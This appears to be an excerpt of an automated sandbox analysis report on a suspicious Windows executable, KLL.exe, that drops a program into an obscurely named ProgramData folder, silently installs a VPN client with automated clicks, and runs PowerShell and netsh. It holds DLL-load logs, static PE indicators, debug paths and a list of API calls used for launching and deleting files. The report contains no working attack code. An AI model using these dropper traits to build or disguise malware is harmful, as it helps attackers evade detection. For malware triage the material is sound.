Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Section loaded: devobj.dll
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Section loaded: msasn1.dll
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Section loaded: devrtl.dll
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Section loaded: spinf.dll
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Section loaded: drvstore.dll
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Section loaded: devobj.dll
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Section loaded: newdev.dll
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Section loaded: msasn1.dll
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Section loaded: gpapi.dll
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Section loaded: cabinet.dll
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpnpmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: devrtl.dll
Source: C:\Windows\System32\drvinst.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\drvinst.exe	Section loaded: devrtl.dll
Source: C:\Windows\System32\drvinst.exe	Section loaded: drvstore.dll
Source: C:\Windows\System32\drvinst.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\drvinst.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\drvinst.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\drvinst.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\drvinst.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\drvinst.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\drvinst.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\drvinst.exe	Section loaded: devrtl.dll
Source: C:\Windows\System32\drvinst.exe	Section loaded: drvstore.dll
Source: C:\Windows\System32\drvinst.exe	Section loaded: devobj.dll
Source: C:\Windows\System32\drvinst.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: licensemanagersvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: licensemanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: clipc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netsetupsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netsetupuser.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: implatsetup.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: devrtl.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: spinf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: drvstore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll

Source: C:\Users\user\Desktop\KLL.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\mmc.exe

Window found: window name: msctls_updown32

Jump to behavior

Source: C:\ProgramData\letsvpn-latest.exe	Automated click: Next >
Source: C:\ProgramData\letsvpn-latest.exe	Automated click: Install

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: KLL.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: KLL.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: KLL.exe

Static file information: File size 32259584 > 1048576

Source: KLL.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x317a00
Source: KLL.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x114a00
Source: KLL.exe	Static PE information: Raw size of .data is bigger than: 0x100000 < 0x1a30800

Source: KLL.exe	Static PE information: More than 200 imports for KERNEL32.dll
Source: KLL.exe	Static PE information: More than 200 imports for USER32.dll

Source: KLL.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: KLL.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: KLL.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: KLL.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: KLL.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: KLL.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: KLL.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: KLL.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Users\winsign\samuli\source\repos\tap-windows6\src\x64\Release\tap0901.pdb source: drvinst.exe, 00000028.00000003.2603338357.000001C1D95AD000.00000004.00000020.00020000.00000000.sdmp, drvinst.exe, 00000028.00000003.2598324806.000001C1D94EE000.00000004.00000020.00020000.00000000.sdmp, drvinst.exe, 00000029.00000003.2613186050.000001D200F14000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\WorkShop\SuperSocket.Clientuser\obj\Release\SuperSocket.Clientuser.pdbR source: LetsPRO.exe, 0000003C.00000002.4117282589.0000000039F82000.00000002.00000001.01000000.0000003C.sdmp
Source:	Binary string: E:\A\_work\1795\s\corefx\bin\obj\Windows_NT.AnyCPU.Release\System.Runtime.InteropServices.RuntimeInformation\net462\System.Runtime.InteropServices.RuntimeInformation.pdb source: LetsPRO.exe, 0000003C.00000002.4063922305.0000000006942000.00000002.00000001.01000000.00000020.sdmp
Source:	Binary string: D:\simba9_pc\trunk\simba9\bin\Release\bin\uc_ctrl.pdb source: uc_ctrl.exe, 00000013.00000002.4020635619.0000000000C6A000.00000002.00000001.01000000.0000000A.sdmp, uc_ctrl.exe, 00000013.00000000.2301032573.0000000000C6A000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: D:\a\1\s\LetsVPN\obj\Release\LetsPRO.pdb source: LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp
Source:	Binary string: D:\a\_work\1\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Memory\netfx\System.Memory.pdb source: LetsPRO.exe, 0000003C.00000002.4064210674.0000000006FD2000.00000002.00000001.01000000.00000021.sdmp
Source:	Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\StubExecutable.pdb source: LetsPRO.exe, 0000003B.00000002.2689821111.0000000000F4D000.00000002.00000001.01000000.00000018.sdmp, LetsPRO.exe, 0000003B.00000000.2674046018.0000000000F4D000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: D:\simba9_pc\trunk\simba9\bin\Release\bin\uc_ctrl.pdb22 source: uc_ctrl.exe, 00000013.00000002.4020635619.0000000000C6A000.00000002.00000001.01000000.0000000A.sdmp, uc_ctrl.exe, 00000013.00000000.2301032573.0000000000C6A000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: c:\git\OSS\notifyicon-wpf\Hardcodet.NotifyIcon.Wpf\Source\NotifyIconWpf\obj\Release\Hardcodet.Wpf.TaskbarNotification.pdb source: LetsPRO.exe, 0000003C.00000002.4097109567.0000000035C42000.00000002.00000001.01000000.00000033.sdmp
Source:	Binary string: C:\Users\eric\dev\cb\bld\bin\e_sqlite3\win\v141\plain\x86\e_sqlite3.pdb source: LetsPRO.exe, 0000003C.00000002.4139617081.0000000067F37000.00000002.00000001.01000000.0000002E.sdmp
Source:	Binary string: c:\users\samuli\opt\tap-windows6-mattock\tapinstall\7600\objfre_wlh_amd64\amd64\tapinstall.pdb source: tapinstall.exe, 00000023.00000000.2581148490.00007FF6FFBE1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000023.00000002.2582900585.00007FF6FFBE1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000025.00000002.2621289880.00007FF6FFBE1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000025.00000000.2583643703.00007FF6FFBE1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000039.00000002.2636929891.00007FF6FFBE1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000039.00000000.2632218485.00007FF6FFBE1000.00000020.00000001.01000000.00000017.sdmp
Source:	Binary string: D:\a\1\s\SDK\AppCenterAnalytics\Microsoft.AppCenter.Analytics.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Analytics.pdbSHA256 source: LetsPRO.exe, 0000003C.00000002.4072724496.00000000301D2000.00000002.00000001.01000000.00000027.sdmp
Source:	Binary string: C:\WorkShop\WebSocket4Net\WebSocket4Net\obj\Release\WebSocket4Net.pdb source: LetsPRO.exe, 0000003C.00000002.4116789613.0000000039E02000.00000002.00000001.01000000.0000003B.sdmp
Source:	Binary string: D:\a\1\s\LetsVPNInfraStructure\obj\Release\LetsVPNInfraStructure.pdb source: LetsPRO.exe, 0000003C.00000002.4064675178.0000000007112000.00000002.00000001.01000000.00000024.sdmp
Source:	Binary string: /_/CommunityToolkit.Mvvm/obj/Release/netstandard2.0/CommunityToolkit.Mvvm.pdbSHA256 source: LetsPRO.exe, 0000003C.00000002.4063520256.00000000068A2000.00000002.00000001.01000000.0000001F.sdmp
Source:	Binary string: D:\a\1\s\SDK\AppCenter\Microsoft.AppCenter.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.pdb source: LetsPRO.exe, 0000003C.00000002.4074066016.0000000030482000.00000002.00000001.01000000.00000028.sdmp
Source:	Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.batteries_v2.e_sqlite3.dynamic\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdb source: LetsPRO.exe, 0000003C.00000002.4082995066.0000000030F62000.00000002.00000001.01000000.0000002A.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.CompilerServices.Unsafe\net461-Release\System.Runtime.CompilerServices.Unsafe.pdbBSJB source: LetsPRO.exe, 0000003C.00000002.4063839681.00000000068D2000.00000002.00000001.01000000.00000022.sdmp
Source:	Binary string: /_/CommunityToolkit.Mvvm/obj/Release/netstandard2.0/CommunityToolkit.Mvvm.pdb source: LetsPRO.exe, 0000003C.00000002.4063520256.00000000068A2000.00000002.00000001.01000000.0000001F.sdmp
Source:	Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdbSHA256xpRb source: LetsPRO.exe, 0000003C.00000002.4083227648.0000000030F92000.00000002.00000001.01000000.0000002B.sdmp
Source:	Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.provider.dynamic_cdecl\obj\Release\netstandard2.0\SQLitePCLRaw.provider.dynamic_cdecl.pdb source: LetsPRO.exe, 0000003C.00000002.4083406917.0000000030FB2000.00000002.00000001.01000000.0000002D.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.CompilerServices.Unsafe\net461-Release\System.Runtime.CompilerServices.Unsafe.pdb source: LetsPRO.exe, 0000003C.00000002.4063839681.00000000068D2000.00000002.00000001.01000000.00000022.sdmp
Source:	Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.provider.dynamic_cdecl\obj\Release\netstandard2.0\SQLitePCLRaw.provider.dynamic_cdecl.pdbSHA256 source: LetsPRO.exe, 0000003C.00000002.4083406917.0000000030FB2000.00000002.00000001.01000000.0000002D.sdmp
Source:	Binary string: Extract: Mono.Cecil.Pdb.dll... 100% source: letsvpn-latest.exe, 00000015.00000003.2674604812.00000000007F6000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000002.2675464551.00000000007F6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.batteries_v2.e_sqlite3.dynamic\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdbSHA256 source: LetsPRO.exe, 0000003C.00000002.4082995066.0000000030F62000.00000002.00000001.01000000.0000002A.sdmp
Source:	Binary string: vcruntime140.i386.pdb source: uc_ctrl.exe, uc_ctrl.exe, 00000013.00000002.4040392187.0000000073D81000.00000020.00000001.01000000.0000000D.sdmp
Source:	Binary string: vcruntime140.i386.pdbGCTL source: uc_ctrl.exe, 00000013.00000002.4040392187.0000000073D81000.00000020.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\a\1\s\SDK\AppCenterCrashes\Microsoft.AppCenter.Crashes.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Crashes.pdb source: LetsPRO.exe, 0000003C.00000002.4073144832.00000000301E2000.00000002.00000001.01000000.00000029.sdmp
Source:	Binary string: msvcp140.i386.pdbGCTL source: uc_ctrl.exe, 00000013.00000002.4039810879.000000006CDC1000.00000020.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\1\s\SDK\AppCenterAnalytics\Microsoft.AppCenter.Analytics.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Analytics.pdb source: LetsPRO.exe, 0000003C.00000002.4072724496.00000000301D2000.00000002.00000001.01000000.00000027.sdmp
Source:	Binary string: c:\users\samuli\opt\tap-windows6-mattock\tapinstall\7600\objfre_wlh_amd64\amd64\tapinstall.pdbH source: tapinstall.exe, 00000023.00000000.2581148490.00007FF6FFBE1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000023.00000002.2582900585.00007FF6FFBE1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000025.00000002.2621289880.00007FF6FFBE1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000025.00000000.2583643703.00007FF6FFBE1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000039.00000002.2636929891.00007FF6FFBE1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000039.00000000.2632218485.00007FF6FFBE1000.00000020.00000001.01000000.00000017.sdmp
Source:	Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.nativelibrary\obj\Release\netstandard2.0\SQLitePCLRaw.nativelibrary.pdbSHA256 source: LetsPRO.exe, 0000003C.00000002.4083133533.0000000030F82000.00000002.00000001.01000000.0000002C.sdmp
Source:	Binary string: C:\WorkShop\SuperSocket.Clientuser\obj\Release\SuperSocket.Clientuser.pdb source: LetsPRO.exe, 0000003C.00000002.4117282589.0000000039F82000.00000002.00000001.01000000.0000003C.sdmp
Source:	Binary string: E:\A\_work\1795\s\corefx\bin\obj\Windows_NT.AnyCPU.Release\System.Runtime.InteropServices.RuntimeInformation\net462\System.Runtime.InteropServices.RuntimeInformation.pdbxE source: LetsPRO.exe, 0000003C.00000002.4063922305.0000000006942000.00000002.00000001.01000000.00000020.sdmp
Source:	Binary string: msvcp140.i386.pdb source: uc_ctrl.exe, uc_ctrl.exe, 00000013.00000002.4039810879.000000006CDC1000.00000020.00000001.01000000.0000000B.sdmp
Source:	Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdb source: LetsPRO.exe, 0000003C.00000002.4083227648.0000000030F92000.00000002.00000001.01000000.0000002B.sdmp
Source:	Binary string: D:\a\1\s\SDK\AppCenterCrashes\Microsoft.AppCenter.Crashes.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Crashes.pdbSHA256, source: LetsPRO.exe, 0000003C.00000002.4073144832.00000000301E2000.00000002.00000001.01000000.00000029.sdmp
Source:	Binary string: C:\WorkShop\WebSocket4Net\WebSocket4Net\obj\Release\WebSocket4Net.pdb* source: LetsPRO.exe, 0000003C.00000002.4116789613.0000000039E02000.00000002.00000001.01000000.0000003B.sdmp
Source:	Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.nativelibrary\obj\Release\netstandard2.0\SQLitePCLRaw.nativelibrary.pdb source: LetsPRO.exe, 0000003C.00000002.4083133533.0000000030F82000.00000002.00000001.01000000.0000002C.sdmp
Source:	Binary string: D:\a\1\s\SDK\AppCenter\Microsoft.AppCenter.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.pdbSHA256X7 source: LetsPRO.exe, 0000003C.00000002.4074066016.0000000030482000.00000002.00000001.01000000.00000028.sdmp

Source: KLL.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: KLL.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: KLL.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: KLL.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: KLL.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: System.Web.Services.Description.resources.dll.21.dr

Static PE information: 0xE58792FF [Fri Jan 11 05:24:15 2092 UTC]

Source: C:\Users\user\Desktop\KLL.exe

Code function: 0_2_00000001800060F0 LoadLibraryW,GetProcAddress,ShellExecuteW,LoadLibraryW,GetProcAddress,Sleep,SleepEx,DeleteFileW,CreateDirectoryW,Sleep,SleepEx,Sleep,SleepEx,ShellExecuteW,Sleep,SleepEx,Sleep,SleepEx,DeleteFileW,DeleteFileW,DeleteFileW,

0_2_00000001800060F0

Source: KLL.exe	Static PE information: section name: .giats
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: vcruntime140.dll.0.dr	Static PE information: section name: _RDATA
Source: s.0.dr	Static PE information: section name: .giats
Source: uc_guilib.dll.16.dr	Static PE information: section name: .giats
Source: msvcp140.dll.19.dr	Static PE information: section name: .didat
Source: uc_guilib.dll.19.dr	Static PE information: section name: .giats
Source: vcruntime140.dll.19.dr	Static PE information: section name: _RDATA
Source: e_sqlite3.dll0.21.dr	Static PE information: section name: _RDATA
Source: WebView2Loader.dll.21.dr	Static PE information: section name: .00cfg
Source: WebView2Loader.dll.21.dr	Static PE information: section name: _RDATA
Source: WebView2Loader.dll0.21.dr	Static PE information: section name: .00cfg
Source: WebView2Loader.dll0.21.dr	Static PE information: section name: .voltbl

Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_00C690A6 push ecx; ret	19_2_00C690B9
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_6CC51D16 push ecx; ret	19_2_6CC51D29
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_6CC51B85 push ecx; ret	19_2_6CC51B98
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_6CDFAE76 push ecx; ret	19_2_6CDFAE89
